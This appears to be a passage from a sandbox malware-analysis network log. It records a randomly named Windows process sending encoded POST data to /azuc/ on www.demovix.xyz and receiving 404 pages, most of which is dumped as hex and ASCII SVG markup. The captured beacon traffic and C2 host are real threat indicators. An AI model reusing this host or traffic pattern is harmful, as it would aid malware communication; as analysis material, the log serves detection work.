                                                                      Data Ascii: 5-12.408c0-3.378-15.347-4.988-40.243-7.225" /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.5
                                                                      Nov 7, 2024 15:29:01.378278017 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22
                                                                      Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none"
                                                                      Nov 7, 2024 15:29:01.378283978 CET848INData Raw: 20 20 20 20 78 31 3d 22 34 32 36 2e 38 37 31 22 20 79 31 3d 22 33 38 36 2e 31 37 35 22 20 78 32 3d 22 34 33 37 2e 34 37 34 22 20 79 32 3d 22 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20
                                                                      Data Ascii: x1="426.871" y1="386.175" x2="437.474" y2="386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="48
                                                                      Nov 7, 2024 15:29:01.378312111 CET1236INData Raw: 20 20 20 20 20 20 78 31 3d 22 32 32 37 2e 35 35 22 20 79 31 3d 22 32 39 35 2e 31 38 39 22 20 78 32 3d 22 32 33 35 2e 33 38 37 22 20 79 32 3d 22 32 39 35 2e 31 38 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20
                                                                      Data Ascii: x1="227.55" y1="295.189" x2="235.387" y2="295.189" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="2
                                                                      Nov 7, 2024 15:29:01.378329039 CET1236INData Raw: 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 38 34 2e 32 31 35 22 20 79 31 3d 22 34 31 31 2e 31 34 36 22 20 78 32 3d 22 34 37 36 2e 33 37 38 22 20 79
                                                                      Data Ascii: troke-miterlimit="10" x1="484.215" y1="411.146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" s
                                                                      Nov 7, 2024 15:29:01.378344059 CET1236INData Raw: 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74
                                                                      Data Ascii: le fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="roun
                                                                      Nov 7, 2024 15:29:01.378359079 CET1236INData Raw: 2d 31 31 35 2e 33 34 2c 33 38 2e 32 31 38 63 2d 32 2e 32 38 2d 30 2e 30 34 38 2d 34 2e 39 32 36 2d 30 2e 32 34 31 2d 37 2e 38 34 31 2d 30 2e 35 34 38 0a 09 09 09 63 2d 36 38 2e 30 33 38 2d 37 2e 31 37 38 2d 31 33 34 2e 32 38 38 2d 34 33 2e 39 36
                                                                      Data Ascii: -115.34,38.218c-2.28-0.048-4.926-0.241-7.841-0.548c-68.038-7.178-134.288-43.963-167.33-103.87c-0.908-1.646-1.793-3.3-2.654-4.964c-18.395-35.511-37.259-83.385-32.075-118.817" /> <path id="backpack" fill="#FFFFFF" stroke="#0E0
                                                                      Nov 7, 2024 15:29:01.378372908 CET848INData Raw: 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 64 3d 22 0a 09 09 09 09 4d 33 36 30 2e 36 33 33 2c 33 36 33 2e 30 33 39 63 31 2e 33 35 32 2c 31 2e 30 36 31 2c 34 2e 39 31 2c 35 2e 30 35 36 2c 35 2e
                                                                      Data Ascii: stroke-miterlimit="10" d="M360.633,363.039c1.352,1.061,4.91,5.056,5.824,6.634l27.874,47.634c3.855,6.649,1.59,15.164-5.059,19.02l0,0c-6.649,3.855-15.164,1.59-19.02-5.059l-5.603-9.663" /> <path fill="#FFFFFF"
                                                                      Nov 7, 2024 15:29:01.383434057 CET1236INData Raw: 0a 09 09 09 09 4d 33 30 31 2e 33 30 31 2c 33 34 37 2e 36 36 63 2d 31 2e 37 30 32 2c 30 2e 32 34 32 2d 35 2e 39 31 2c 31 2e 36 32 37 2d 37 2e 34 39 32 2c 32 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38
                                                                      Data Ascii: M301.301,347.66c-1.702,0.242-5.91,1.627-7.492,2.536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3"


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      18192.168.2.849995199.192.19.19805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:29:03.230871916 CET758OUTPOST /azuc/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.demovix.xyz
                                                                      Origin: http://www.demovix.xyz
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.demovix.xyz/azuc/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 46 47 75 55 66 75 67 39 59 79 56 51 36 72 38 56 52 61 69 78 47 72 49 62 43 71 5a 51 4c 2f 52 6a 43 48 48 49 66 54 48 4f 77 6a 48 4f 56 56 4f 32 53 35 57 35 44 41 6e 4d 44 38 55 59 4c 2b 4f 6b 51 79 32 65 31 59 74 71 63 6e 31 4b 31 6c 71 49 65 49 77 67 31 51 78 2b 30 67 70 43 49 6d 30 41 35 65 56 54 48 43 37 77 6d 38 6f 36 77 69 5a 35 70 69 51 6b 59 72 7a 5a 37 76 45 41 34 74 51 2b 57 6b 77 45 4e 34 34 73 47 64 74 47 36 61 48 74 4c 57 56 6c 77 70 30 55 44 6b 71 4d 69 39 6c 4a 6f 38 46 30 44 34 66 44 44 38 6a 4e 68 57 43 5a 76 33 33 46 37 58 4b 4e 65 67 30 30 31 6b 33 30 36 73 6c 56 52 4c 2f 35 75 6b 2f 32 37 75 6c 34 71 4f 4a 50 4e 61 74 2f 6d 32 67 6d
                                                                      Data Ascii: F2=FGuUfug9YyVQ6r8VRaixGrIbCqZQL/RjCHHIfTHOwjHOVVO2S5W5DAnMD8UYL+OkQy2e1Ytqcn1K1lqIeIwg1Qx+0gpCIm0A5eVTHC7wm8o6wiZ5piQkYrzZ7vEA4tQ+WkwEN44sGdtG6aHtLWVlwp0UDkqMi9lJo8F0D4fDD8jNhWCZv33F7XKNeg001k306slVRL/5uk/27ul4qOJPNat/m2gm
                                                                      Nov 7, 2024 15:29:03.932053089 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 07 Nov 2024 14:29:03 GMT
                                                                      Server: Apache
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Content-Length: 16026
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                      Nov 7, 2024 15:29:03.932115078 CET1236INData Raw: 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38
                                                                      Data Ascii: .196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,
                                                                      Nov 7, 2024 15:29:03.932164907 CET1236INData Raw: 35 2d 31 32 2e 34 30 38 0a 09 09 09 63 30 2d 33 2e 33 37 38 2d 31 35 2e 33 34 37 2d 34 2e 39 38 38 2d 34 30 2e 32 34 33 2d 37 2e 32 32 35 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68
                                                                      Data Ascii: 5-12.408c0-3.378-15.347-4.988-40.243-7.225" /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.5
                                                                      Nov 7, 2024 15:29:03.932197094 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22
                                                                      Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none"
                                                                      Nov 7, 2024 15:29:03.932208061 CET1236INData Raw: 20 20 20 20 78 31 3d 22 34 32 36 2e 38 37 31 22 20 79 31 3d 22 33 38 36 2e 31 37 35 22 20 78 32 3d 22 34 33 37 2e 34 37 34 22 20 79 32 3d 22 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20
                                                                      Data Ascii: x1="426.871" y1="386.175" x2="437.474" y2="386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="48
                                                                      Nov 7, 2024 15:29:03.932219982 CET1236INData Raw: 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 34 37 2e 39 35 22 20 79 31 3d 22 35 35 31 2e 37 31 39 22 20 78 32 3d 22 32 34 30 2e 31 31 33 22 20 79 32
                                                                      Data Ascii: troke-miterlimit="10" x1="247.95" y1="551.719" x2="240.113" y2="551.719" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miter
                                                                      Nov 7, 2024 15:29:03.932230949 CET1236INData Raw: 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20
                                                                      Data Ascii: ="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit=
                                                                      Nov 7, 2024 15:29:03.932244062 CET36INData Raw: 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22
                                                                      Data Ascii: <circle fill="#0E0620" cx="
                                                                      Nov 7, 2024 15:29:03.932259083 CET1236INData Raw: 35 34 39 2e 38 37 39 22 20 63 79 3d 22 32 39 36 2e 34 30 32 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 32 35 33 2e
                                                                      Data Ascii: 549.879" cy="296.402" r="2.651" /> <circle fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy
                                                                      Nov 7, 2024 15:29:03.932271004 CET1236INData Raw: 2d 32 35 2e 34 35 35 6c 31 35 2e 36 39 34 2d 35 38 2e 35 33 37 0a 09 09 09 63 33 2e 38 38 39 2d 31 34 2e 35 30 34 2c 31 38 2e 37 39 39 2d 32 33 2e 31 31 2c 33 33 2e 33 30 33 2d 31 39 2e 32 32 31 6c 35 32 2e 33 34 39 2c 31 34 2e 30 33 35 63 31 34
                                                                      Data Ascii: -25.455l15.694-58.537c3.889-14.504,18.799-23.11,33.303-19.221l52.349,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <lin
                                                                      Nov 7, 2024 15:29:03.937340021 CET1236INData Raw: 39 34 63 32 2e 33 34 34 2c 31 2e 33 34 33 2c 34 2e 33 38 33 2c 33 2e 32 38 39 2c 35 2e 38 33 37 2c 35 2e 37 39 33 0a 09 09 09 09 63 34 2e 34 31 31 2c 37 2e 35 39 36 2c 31 2e 38 32 39 2c 31 37 2e 33 33 2d 35 2e 37 36 37 2c 32 31 2e 37 34 31 63 2d
                                                                      Data Ascii: 94c2.344,1.343,4.383,3.289,5.837,5.793c4.411,7.596,1.829,17.33-5.767,21.741c-7.596,4.411-17.33,1.829-21.741-5.767c-1.754-3.021-2.817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      19192.168.2.849996199.192.19.19805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:29:05.778769016 CET1775OUTPOST /azuc/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.demovix.xyz
                                                                      Origin: http://www.demovix.xyz
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1239
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.demovix.xyz/azuc/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 46 47 75 55 66 75 67 39 59 79 56 51 36 72 38 56 52 61 69 78 47 72 49 62 43 71 5a 51 4c 2f 52 6a 43 48 48 49 66 54 48 4f 77 6a 50 4f 56 48 32 32 51 61 4f 35 52 51 6e 4d 41 38 55 62 4c 2b 50 34 51 79 65 61 31 59 78 36 63 6c 64 4b 30 48 69 49 59 37 6f 67 2f 51 78 2b 32 67 70 48 47 47 30 56 35 66 35 58 48 43 72 77 6d 38 6f 36 77 68 78 35 75 32 6b 6b 61 72 7a 61 73 66 45 45 38 74 52 5a 57 67 64 7a 4e 35 4d 38 47 75 31 47 35 2b 72 74 4b 6c 78 6c 38 70 30 61 47 6b 71 66 69 39 70 2f 6f 36 68 53 44 34 43 75 44 37 6e 4e 6a 69 72 34 31 6a 75 62 6d 58 76 7a 65 68 63 2f 37 7a 2f 50 7a 4f 35 69 52 5a 44 5a 6e 78 4c 61 74 75 31 72 6d 66 49 36 58 37 35 38 6a 67 49 72 56 78 59 5a 6c 6c 77 47 5a 30 53 50 7a 62 56 38 42 4b 4c 7a 37 79 67 51 7a 71 6c 30 74 43 54 47 73 38 79 4c 4d 38 6d 69 48 79 56 57 76 53 6f 77 48 38 73 65 4b 6b 61 78 79 73 73 74 2b 66 78 63 6d 54 72 30 30 78 39 46 6e 58 34 50 2f 2f 39 34 58 2b 63 6c 2f 62 68 6b 74 77 62 39 45 2f 68 54 42 2b 6b 50 56 43 76 57 67 49 43 46 4f 6e 47 50 53 73 58 [TRUNCATED]
                                                                      Data Ascii: F2=FGuUfug9YyVQ6r8VRaixGrIbCqZQL/RjCHHIfTHOwjPOVH22QaO5RQnMA8UbL+P4Qyea1Yx6cldK0HiIY7og/Qx+2gpHGG0V5f5XHCrwm8o6whx5u2kkarzasfEE8tRZWgdzN5M8Gu1G5+rtKlxl8p0aGkqfi9p/o6hSD4CuD7nNjir41jubmXvzehc/7z/PzO5iRZDZnxLatu1rmfI6X758jgIrVxYZllwGZ0SPzbV8BKLz7ygQzql0tCTGs8yLM8miHyVWvSowH8seKkaxysst+fxcmTr00x9FnX4P//94X+cl/bhktwb9E/hTB+kPVCvWgICFOnGPSsXb3FMHV1oqBC8KvLosmZMVBwygGykyI2J9RjlbwKJwVEt3jXx6LfRGq82MsON1LrL2TA32IGolnSlabf+jYFtM8mL1ZY13MXSGX8FplSnIHmOcH6gRnhVsbfMAzcrxeM59K9XozHyF4LUcvlf4zYLfmQG1zEdtCW2UMFsZcCbjUXI7bS4yT73fgt3koeGM+J8iwsvU3Qxp/Y22cnWz6nBuWk1ZaCs4AZJA4H6xrJ/03W7TO3rc8uclH88VZgf29x1PI5FSTYrMsAGOeJzDDMD1ATNH2UxWvdCD1mzfp4HfNwKrlZmimuk1fspOgiEjyfZ3p3phrF8HZ/Bv8HipStPipqmhs/DIK+nho9ZpoXbm8PxNOz6GCqilx/BDAJG2A4WSMHyCJesr0OAFsfv1nC4Tw/4/uGwFtCPAu1fKIrVNTc9XD7o+0A4TmbRcwm/d0IODr3KkCh0JGP3Txm7HaQkhTmuWlHwWTPnc7AskdSAxyL/YoV9O+mzcLZ2vsq4vZ9yyDFEgQ2hL4jMov4eBHn4OHw6hrUZ2gvp950/QFyl2spgzbISf5XLX0xqItJmgjJGwGhTasnTG84QwwyqTXO+NF4r8+rUbJYEPpa7U4YXYm0QrFpSfi4eQoKmR55WcukoBSiXorEZtK7PU0SgpWtwCRX9QpJKwMYrU5 [TRUNCATED]
                                                                      Nov 7, 2024 15:29:06.449321032 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 07 Nov 2024 14:29:06 GMT
                                                                      Server: Apache
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Content-Length: 16026
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                      Nov 7, 2024 15:29:06.449357033 CET1236INData Raw: 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38
                                                                      Data Ascii: .196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,
                                                                      Nov 7, 2024 15:29:06.449372053 CET1236INData Raw: 35 2d 31 32 2e 34 30 38 0a 09 09 09 63 30 2d 33 2e 33 37 38 2d 31 35 2e 33 34 37 2d 34 2e 39 38 38 2d 34 30 2e 32 34 33 2d 37 2e 32 32 35 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68
                                                                      Data Ascii: 5-12.408c0-3.378-15.347-4.988-40.243-7.225" /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.5
                                                                      Nov 7, 2024 15:29:06.449385881 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22
                                                                      Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none"
                                                                      Nov 7, 2024 15:29:06.449399948 CET848INData Raw: 20 20 20 20 78 31 3d 22 34 32 36 2e 38 37 31 22 20 79 31 3d 22 33 38 36 2e 31 37 35 22 20 78 32 3d 22 34 33 37 2e 34 37 34 22 20 79 32 3d 22 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20
                                                                      Data Ascii: x1="426.871" y1="386.175" x2="437.474" y2="386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="48
                                                                      Nov 7, 2024 15:29:06.449412107 CET1236INData Raw: 20 20 20 20 20 20 78 31 3d 22 32 32 37 2e 35 35 22 20 79 31 3d 22 32 39 35 2e 31 38 39 22 20 78 32 3d 22 32 33 35 2e 33 38 37 22 20 79 32 3d 22 32 39 35 2e 31 38 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20
                                                                      Data Ascii: x1="227.55" y1="295.189" x2="235.387" y2="295.189" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="2
                                                                      Nov 7, 2024 15:29:06.449425936 CET1236INData Raw: 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 38 34 2e 32 31 35 22 20 79 31 3d 22 34 31 31 2e 31 34 36 22 20 78 32 3d 22 34 37 36 2e 33 37 38 22 20 79
                                                                      Data Ascii: troke-miterlimit="10" x1="484.215" y1="411.146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" s
                                                                      Nov 7, 2024 15:29:06.449441910 CET424INData Raw: 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74
                                                                      Data Ascii: le fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="roun
